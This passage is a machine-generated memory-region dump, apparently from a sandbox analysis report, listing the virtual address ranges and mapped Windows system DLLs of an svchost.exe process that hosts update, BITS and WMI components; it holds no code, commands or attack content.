start_va = 0x51e7980000 end_va = 0x51e7a7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7980000" filename = "" Region: id = 5537 start_va = 0x51e7a80000 end_va = 0x51e7afffff entry_point = 0x0 region_type = private name = "private_0x00000051e7a80000" filename = "" Region: id = 5538 start_va = 0x51e7b00000 end_va = 0x51e7bfffff entry_point = 0x0 region_type = private name = "private_0x00000051e7b00000" filename = "" Region: id = 5539 start_va = 0x51e7c00000 end_va = 0x51e7c8afff entry_point = 0x51e7c00000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 5540 start_va = 0x51e7c90000 end_va = 0x51e7d8ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7c90000" filename = "" Region: id = 5541 start_va = 0x51e7d90000 end_va = 0x51e7e8ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7d90000" filename = "" Region: id = 5542 start_va = 0x51e7e90000 end_va = 0x51e7f8ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7e90000" filename = "" Region: id = 5543 start_va = 0x51e7f90000 end_va = 0x51e800ffff entry_point = 0x0 region_type = private name = "private_0x00000051e7f90000" filename = "" Region: id = 5544 start_va = 0x51e8010000 end_va = 0x51e8010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8010000" filename = "" Region: id = 5545 start_va = 0x51e8020000 end_va = 0x51e8022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8020000" filename = "" Region: id = 5546 start_va = 0x51e8030000 end_va = 0x51e8030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8030000" filename = "" Region: id = 5547 start_va = 0x51e8040000 end_va = 0x51e8040fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8040000" filename = "" Region: id = 5548 start_va = 0x51e8050000 end_va = 0x51e80cffff entry_point = 0x0 region_type = private name = "private_0x00000051e8050000" filename = "" Region: id = 5549 start_va = 0x51e8110000 end_va = 0x51e820ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8110000" filename = "" Region: id = 5550 start_va = 0x51e8290000 end_va = 0x51e838ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8290000" filename = "" Region: id = 5551 start_va = 0x51e8390000 end_va = 0x51e848ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8390000" filename = "" Region: id = 5552 start_va = 0x51e8490000 end_va = 0x51e850ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8490000" filename = "" Region: id = 5553 start_va = 0x51e8510000 end_va = 0x51e860ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000051e8510000" filename = "" Region: id = 5554 start_va = 0x51e8620000 end_va = 0x51e8626fff entry_point = 0x0 region_type = private name = "private_0x00000051e8620000" filename = "" Region: id = 5555 start_va = 0x51e8630000 end_va = 0x51e8636fff entry_point = 0x0 region_type = private name = "private_0x00000051e8630000" filename = "" Region: id = 5556 start_va = 0x51e8700000 end_va = 0x51e87fffff entry_point = 0x0 region_type = private name = "private_0x00000051e8700000" filename = "" Region: id = 5557 start_va = 0x51e8800000 end_va = 0x51e88fffff entry_point = 0x0 region_type = private name = "private_0x00000051e8800000" filename = "" Region: id = 5558 start_va = 0x51e8900000 end_va = 0x51e89fffff entry_point = 0x0 region_type = private name = "private_0x00000051e8900000" filename = "" Region: id = 5559 start_va = 0x51e8a80000 end_va = 0x51e8b7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8a80000" filename = "" Region: id = 5560 start_va = 0x51e8c00000 end_va = 0x51e8c7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8c00000" filename = "" Region: id = 5561 start_va = 0x51e8c80000 end_va = 0x51e8d7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8c80000" filename = "" Region: id = 5562 start_va = 0x51e8e00000 end_va = 0x51e8e7ffff entry_point = 0x0 region_type = private name = "private_0x00000051e8e00000" filename = "" Region: id = 5563 start_va = 0x51e8f00000 end_va = 0x51e8ffffff entry_point = 0x0 region_type = private name = "private_0x00000051e8f00000" filename = "" Region: id = 5564 start_va = 0x51e9000000 end_va = 0x51e90fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9000000" filename = "" Region: id = 5565 start_va = 0x51e9100000 end_va = 0x51e917ffff entry_point = 0x0 region_type = private name = "private_0x00000051e9100000" filename = "" Region: id = 5566 start_va = 0x51e9180000 end_va = 0x51e91fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9180000" filename = "" Region: id = 5567 start_va = 0x51e9200000 end_va = 0x51e92fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9200000" filename = "" Region: id = 5568 start_va = 0x51e9300000 end_va = 0x51e93fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9300000" filename = "" Region: id = 5569 start_va = 0x51e9400000 end_va = 0x51e94fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9400000" filename = "" Region: id = 5570 start_va = 0x51e9500000 end_va = 0x51e95fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9500000" filename = "" Region: id = 5571 start_va = 0x51e9600000 end_va = 0x51e96fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9600000" filename = "" Region: id = 5572 start_va = 0x51e9700000 end_va = 0x51e97fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9700000" filename = "" Region: id = 5573 start_va = 0x51e9800000 end_va = 0x51e98fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9800000" filename = "" Region: id = 5574 start_va = 0x51e9900000 end_va = 0x51e99fffff entry_point = 0x0 region_type = private name = "private_0x00000051e9900000" filename = "" Region: id = 5575 start_va = 0x51e9a00000 end_va = 0x51e9afffff entry_point = 0x0 region_type = private name = "private_0x00000051e9a00000" filename = "" Region: id = 5576 start_va = 0x51e9b00000 end_va = 0x51e9bfffff entry_point = 0x0 region_type = private name = "private_0x00000051e9b00000" filename = "" Region: id = 5577 start_va = 0x51e9c00000 end_va = 0x51e9cfffff entry_point = 0x0 region_type = private name = "private_0x00000051e9c00000" filename = "" Region: id = 5578 start_va = 0x51e9d00000 end_va = 0x51e9dfffff entry_point = 0x0 region_type = private name = "private_0x00000051e9d00000" filename = "" Region: id = 5579 start_va = 0x51e9e00000 end_va = 0x51e9efffff entry_point = 0x0 region_type = private name = "private_0x00000051e9e00000" filename = "" Region: id = 5580 start_va = 0x51e9f00000 end_va = 0x51e9fdefff entry_point = 0x51e9f00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5581 start_va = 0x51e9fe0000 end_va = 0x51ea0dffff entry_point = 0x0 region_type = private name = "private_0x00000051e9fe0000" filename = "" Region: id = 5582 start_va = 0x51ea0e0000 end_va = 0x51ea15ffff entry_point = 0x0 region_type = private name = "private_0x00000051ea0e0000" filename = "" Region: id = 5583 start_va = 0x51ea170000 end_va = 0x51ea176fff entry_point = 0x0 region_type = private name = "private_0x00000051ea170000" filename = "" Region: id = 5584 start_va = 0x51ea180000 end_va = 0x51ea27ffff entry_point = 0x0 region_type = private name = "private_0x00000051ea180000" filename = "" Region: id = 5585 start_va = 0x51ea300000 end_va = 0x51ea3fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea300000" filename = "" Region: id = 5586 start_va = 0x51ea400000 end_va = 0x51ea4fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea400000" filename = "" Region: id = 5587 start_va = 0x51ea600000 end_va = 0x51ea6fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea600000" filename = "" Region: id = 5588 start_va = 0x51ea700000 end_va = 0x51ea7fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea700000" filename = "" Region: id = 5589 start_va = 0x51ea800000 end_va = 0x51ea8fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea800000" filename = "" Region: id = 5590 start_va = 0x51ea900000 end_va = 0x51ea9fffff entry_point = 0x0 region_type = private name = "private_0x00000051ea900000" filename = "" Region: id = 5591 start_va = 0x51eaa00000 end_va = 0x51eaafffff entry_point = 0x0 region_type = private name = "private_0x00000051eaa00000" filename = "" Region: id = 5592 start_va = 0x51eab00000 end_va = 0x51eabfffff entry_point = 0x0 region_type = private name = "private_0x00000051eab00000" filename = "" Region: id = 5593 start_va = 0x51eac00000 end_va = 0x51eacfffff entry_point = 0x0 region_type = private name = "private_0x00000051eac00000" filename = "" Region: id = 5594 start_va = 0x51ead00000 end_va = 0x51eadfffff entry_point = 0x0 region_type = private name = "private_0x00000051ead00000" filename = "" Region: id = 5595 start_va = 0x51eae00000 end_va = 0x51eaefffff entry_point = 0x0 region_type = private name = "private_0x00000051eae00000" filename = "" Region: id = 5596 start_va = 0x51eaf00000 end_va = 0x51eaffffff entry_point = 0x0 region_type = private name = "private_0x00000051eaf00000" filename = "" Region: id = 5597 start_va = 0x51eb000000 end_va = 0x51eb0fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb000000" filename = "" Region: id = 5598 start_va = 0x51eb200000 end_va = 0x51eb2fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb200000" filename = "" Region: id = 5599 start_va = 0x51eb700000 end_va = 0x51eb7fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb700000" filename = "" Region: id = 5600 start_va = 0x51eb800000 end_va = 0x51eb8fffff entry_point = 0x0 region_type = private name = "private_0x00000051eb800000" filename = "" Region: id = 5601 start_va = 0x51eba00000 end_va = 0x51ebafffff entry_point = 0x0 region_type = private name = "private_0x00000051eba00000" filename = "" Region: id = 5602 start_va = 0x51ebc00000 end_va = 0x51ebcfffff entry_point = 0x0 region_type = private name = "private_0x00000051ebc00000" filename = "" Region: id = 5603 start_va = 0x51ec200000 end_va = 0x51ec2fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec200000" filename = "" Region: id = 5604 start_va = 0x51ec300000 end_va = 0x51ec3fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec300000" filename = "" Region: id = 5605 start_va = 0x51ec400000 end_va = 0x51ec4fffff entry_point = 0x0 region_type = private name = "private_0x00000051ec400000" filename = "" Region: id = 5606 start_va = 0x7df5ffdb0000 end_va = 0x7ff5ffdaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffdb0000" filename = "" Region: id = 5607 start_va = 0x7ff7b3a9c000 end_va = 0x7ff7b3a9dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3a9c000" filename = "" Region: id = 5608 start_va = 0x7ff7b3a9e000 end_va = 0x7ff7b3a9ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3a9e000" filename = "" Region: id = 5609 start_va = 0x7ff7b3aaa000 end_va = 0x7ff7b3aabfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aaa000" filename = "" Region: id = 5610 start_va = 0x7ff7b3aae000 end_va = 0x7ff7b3aaffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aae000" filename = "" Region: id = 5611 start_va = 0x7ff7b3ab0000 end_va = 0x7ff7b3ab1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ab0000" filename = "" Region: id = 5612 start_va = 0x7ff7b3ab4000 end_va = 0x7ff7b3ab5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ab4000" filename = "" Region: id = 5613 start_va = 0x7ff7b3ab6000 end_va = 0x7ff7b3ab7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ab6000" filename = "" Region: id = 5614 start_va = 0x7ff7b3abe000 end_va = 0x7ff7b3abffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3abe000" filename = "" Region: id = 5615 start_va = 0x7ff7b3ac0000 end_va = 0x7ff7b3ac1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ac0000" filename = "" Region: id = 5616 start_va = 0x7ff7b3ac2000 end_va = 0x7ff7b3ac3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ac2000" filename = "" Region: id = 5617 start_va = 0x7ff7b3ac4000 end_va = 0x7ff7b3ac5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ac4000" filename = "" Region: id = 5618 start_va = 0x7ff7b3ac8000 end_va = 0x7ff7b3ac9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ac8000" filename = "" Region: id = 5619 start_va = 0x7ff7b3aca000 end_va = 0x7ff7b3acbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aca000" filename = "" Region: id = 5620 start_va = 0x7ff7b3acc000 end_va = 0x7ff7b3acdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3acc000" filename = "" Region: id = 5621 start_va = 0x7ff7b3ace000 end_va = 0x7ff7b3acffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ace000" filename = "" Region: id = 5622 start_va = 0x7ff7b3ad0000 end_va = 0x7ff7b3ad1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ad0000" filename = "" Region: id = 5623 start_va = 0x7ff7b3ad2000 end_va = 0x7ff7b3ad3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ad2000" filename = "" Region: id = 5624 start_va = 0x7ff7b3ad4000 end_va = 0x7ff7b3ad5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ad4000" filename = "" Region: id = 5625 start_va = 0x7ff7b3ad6000 end_va = 0x7ff7b3ad7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ad6000" filename = "" Region: id = 5626 start_va = 0x7ff7b3ad8000 end_va = 0x7ff7b3ad9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ad8000" filename = "" Region: id = 5627 start_va = 0x7ff7b3ada000 end_va = 0x7ff7b3adbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ada000" filename = "" Region: id = 5628 start_va = 0x7ff7b3adc000 end_va = 0x7ff7b3addfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3adc000" filename = "" Region: id = 5629 start_va = 0x7ff7b3ade000 end_va = 0x7ff7b3adffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ade000" filename = "" Region: id = 5630 start_va = 0x7ff7b3ae0000 end_va = 0x7ff7b3ae1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ae0000" filename = "" Region: id = 5631 start_va = 0x7ff7b3ae2000 end_va = 0x7ff7b3ae3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ae2000" filename = "" Region: id = 5632 start_va = 0x7ff7b3ae4000 end_va = 0x7ff7b3ae5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ae4000" filename = "" Region: id = 5633 start_va = 0x7ff7b3ae6000 end_va = 0x7ff7b3ae7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ae6000" filename = "" Region: id = 5634 start_va = 0x7ff7b3ae8000 end_va = 0x7ff7b3ae9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3ae8000" filename = "" Region: id = 5635 start_va = 0x7ff7b3aea000 end_va = 0x7ff7b3aebfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aea000" filename = "" Region: id = 5636 start_va = 0x7ff7b3aec000 end_va = 0x7ff7b3aedfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3aec000" filename = "" Region: id = 5637 start_va = 0x7ff7b3af0000 end_va = 0x7ff7b3af1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3af0000" filename = "" Region: id = 5638 start_va = 0x7ff7b3af2000 end_va = 0x7ff7b3af3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3af2000" filename = "" Region: id = 5639 start_va = 0x7ff7b3af4000 end_va = 0x7ff7b3af5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3af4000" filename = "" Region: id = 5640 start_va = 0x7ff7b3af6000 end_va = 0x7ff7b3af7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3af6000" filename = "" Region: id = 5641 start_va = 0x7ff7b3afa000 end_va = 0x7ff7b3afbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3afa000" filename = "" Region: id = 5642 start_va = 0x7ff7b3afc000 end_va = 0x7ff7b3afdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3afc000" filename = "" Region: id = 5643 start_va = 0x7ff7b3afe000 end_va = 0x7ff7b3afffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3afe000" filename = "" Region: id = 5644 start_va = 0x7ff7b3b00000 end_va = 0x7ff7b3b01fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b00000" filename = "" Region: id = 5645 start_va = 0x7ff7b3b02000 end_va = 0x7ff7b3b03fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b02000" filename = "" Region: id = 5646 start_va = 0x7ff7b3b04000 end_va = 0x7ff7b3b05fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b04000" filename = "" Region: id = 5647 start_va = 0x7ff7b3b06000 end_va = 0x7ff7b3b07fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b06000" filename = "" Region: id = 5648 start_va = 0x7ff7b3b08000 end_va = 0x7ff7b3b09fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b08000" filename = "" Region: id = 5649 start_va = 0x7ff7b3b0a000 end_va = 0x7ff7b3b0bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b0a000" filename = "" Region: id = 5650 start_va = 0x7ff7b3b0c000 end_va = 0x7ff7b3b0dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b0c000" filename = "" Region: id = 5651 start_va = 0x7ff7b3b0e000 end_va = 0x7ff7b3b0ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b0e000" filename = "" Region: id = 5652 start_va = 0x7ff7b3b10000 end_va = 0x7ff7b3b11fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b10000" filename = "" Region: id = 5653 start_va = 0x7ff7b3b12000 end_va = 0x7ff7b3b13fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b12000" filename = "" Region: id = 5654 start_va = 0x7ff7b3b14000 end_va = 0x7ff7b3b15fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b14000" filename = "" Region: id = 5655 start_va = 0x7ff7b3b16000 end_va = 0x7ff7b3b17fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b16000" filename = "" Region: id = 5656 start_va = 0x7ff7b3b18000 end_va = 0x7ff7b3b19fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b18000" filename = "" Region: id = 5657 start_va = 0x7ff7b3b1a000 end_va = 0x7ff7b3b1bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b1a000" filename = "" Region: id = 5658 start_va = 0x7ff7b3b1c000 end_va = 0x7ff7b3b1dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b1c000" filename = "" Region: id = 5659 start_va = 0x7ff7b3b1e000 end_va = 0x7ff7b3b1ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b1e000" filename = "" Region: id = 5660 start_va = 0x7ff7b3b20000 end_va = 0x7ff7b3b21fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b20000" filename = "" Region: id = 5661 start_va = 0x7ff7b3b22000 end_va = 0x7ff7b3b23fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b22000" filename = "" Region: id = 5662 start_va = 0x7ff7b3b24000 end_va = 0x7ff7b3b25fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b24000" filename = "" Region: id = 5663 start_va = 0x7ff7b3b26000 end_va = 0x7ff7b3b27fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b26000" filename = "" Region: id = 5664 start_va = 0x7ff7b3b28000 end_va = 0x7ff7b3b29fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b28000" filename = "" Region: id = 5665 start_va = 0x7ff7b3b2a000 end_va = 0x7ff7b3b2bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b2a000" filename = "" Region: id = 5666 start_va = 0x7ff7b3b2c000 end_va = 0x7ff7b3b2dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b2c000" filename = "" Region: id = 5667 start_va = 0x7ff7b3b2e000 end_va = 0x7ff7b3b2ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3b2e000" filename = "" Region: id = 5668 start_va = 0x7ff7b3b30000 end_va = 0x7ff7b3c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3b30000" filename = "" Region: id = 5669 start_va = 0x7ff7b3c30000 end_va = 0x7ff7b3c52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3c30000" filename = "" Region: id = 5670 start_va = 0x7ff7b3c53000 end_va = 0x7ff7b3c54fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c53000" filename = "" Region: id = 5671 start_va = 0x7ff7b3c55000 end_va = 0x7ff7b3c56fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c55000" filename = "" Region: id = 5672 start_va = 0x7ff7b3c57000 end_va = 0x7ff7b3c58fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c57000" filename = "" Region: id = 5673 start_va = 0x7ff7b3c59000 end_va = 0x7ff7b3c59fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c59000" filename = "" Region: id = 5674 start_va = 0x7ff7b3c5a000 end_va = 0x7ff7b3c5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c5a000" filename = "" Region: id = 5675 start_va = 0x7ff7b3c5e000 end_va = 0x7ff7b3c5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3c5e000" filename = "" Region: id = 5676 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 5677 start_va = 0x7ffbea8f0000 end_va = 0x7ffbeab19fff entry_point = 0x7ffbea8f0000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 5678 start_va = 0x7ffbeb7e0000 end_va = 0x7ffbeb901fff entry_point = 0x7ffbeb7e0000 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 5679 start_va = 0x7ffbebc40000 end_va = 0x7ffbebd03fff entry_point = 0x7ffbebc40000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 5680 start_va = 0x7ffbebd10000 end_va = 0x7ffbebd28fff entry_point = 0x7ffbebd10000 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 5681 start_va = 0x7ffbebff0000 end_va = 0x7ffbec03cfff entry_point = 0x7ffbebff0000 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 5682 start_va = 0x7ffbed0f0000 end_va = 0x7ffbed12ffff entry_point = 0x7ffbed0f0000 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 5683 start_va = 0x7ffbed130000 end_va = 0x7ffbed189fff entry_point = 0x7ffbed130000 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 5684 start_va = 0x7ffbf2590000 end_va = 0x7ffbf25a1fff entry_point = 0x7ffbf2590000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 5685 start_va = 0x7ffbf25b0000 end_va = 0x7ffbf262ffff entry_point = 0x7ffbf25b0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 5686 start_va = 0x7ffbf2cc0000 end_va = 0x7ffbf2d25fff entry_point = 0x7ffbf2cc0000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 5687 start_va = 0x7ffbf2d30000 end_va = 0x7ffbf2d42fff entry_point = 0x7ffbf2d30000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 5688 start_va = 0x7ffbf2d50000 end_va = 0x7ffbf2d5afff entry_point = 0x7ffbf2d50000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 5689 start_va = 0x7ffbf2d60000 end_va = 0x7ffbf2e80fff entry_point = 0x7ffbf2d60000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 5690 start_va = 0x7ffbf5460000 end_va = 0x7ffbf58c9fff entry_point = 0x7ffbf5460000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 5691 start_va = 0x7ffbf5c50000 end_va = 0x7ffbf5ef6fff entry_point = 0x7ffbf5c50000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 5692 start_va = 0x7ffbf5f00000 end_va = 0x7ffbf5f10fff entry_point = 0x7ffbf5f00000 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 5693 start_va = 0x7ffbf5f20000 end_va = 0x7ffbf5fa2fff entry_point = 0x7ffbf5f20000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 5694 start_va = 0x7ffbf5fb0000 end_va = 0x7ffbf5fc5fff entry_point = 0x7ffbf5fb0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 5695 start_va = 0x7ffbf5fd0000 end_va = 0x7ffbf60a7fff entry_point = 0x7ffbf5fd0000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 5696 start_va = 0x7ffbf60b0000 end_va = 0x7ffbf6112fff entry_point = 0x7ffbf60b0000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 5697 start_va = 0x7ffbf6120000 end_va = 0x7ffbf6144fff entry_point = 0x7ffbf6120000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 5698 start_va = 0x7ffbf6150000 end_va = 0x7ffbf6163fff entry_point = 0x7ffbf6150000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 5699 start_va = 0x7ffbf6170000 end_va = 0x7ffbf6267fff entry_point = 0x7ffbf6170000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 5700 start_va = 0x7ffbf6270000 end_va = 0x7ffbf62e2fff entry_point = 0x7ffbf6270000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 5701 start_va = 0x7ffbf62f0000 end_va = 0x7ffbf6426fff entry_point = 0x7ffbf62f0000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 5702 start_va = 0x7ffbf6430000 end_va = 0x7ffbf64c6fff entry_point = 0x7ffbf6430000 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 5703 start_va = 0x7ffbf64d0000 end_va = 0x7ffbf64e0fff entry_point = 0x7ffbf64d0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 5704 start_va = 0x7ffbf64f0000 end_va = 0x7ffbf6500fff entry_point = 0x7ffbf64f0000 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 5705 start_va = 0x7ffbf6510000 end_va = 